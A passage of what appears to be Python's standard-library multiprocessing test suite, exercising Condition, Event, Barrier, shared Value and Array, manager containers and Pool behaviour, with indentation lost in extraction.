args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
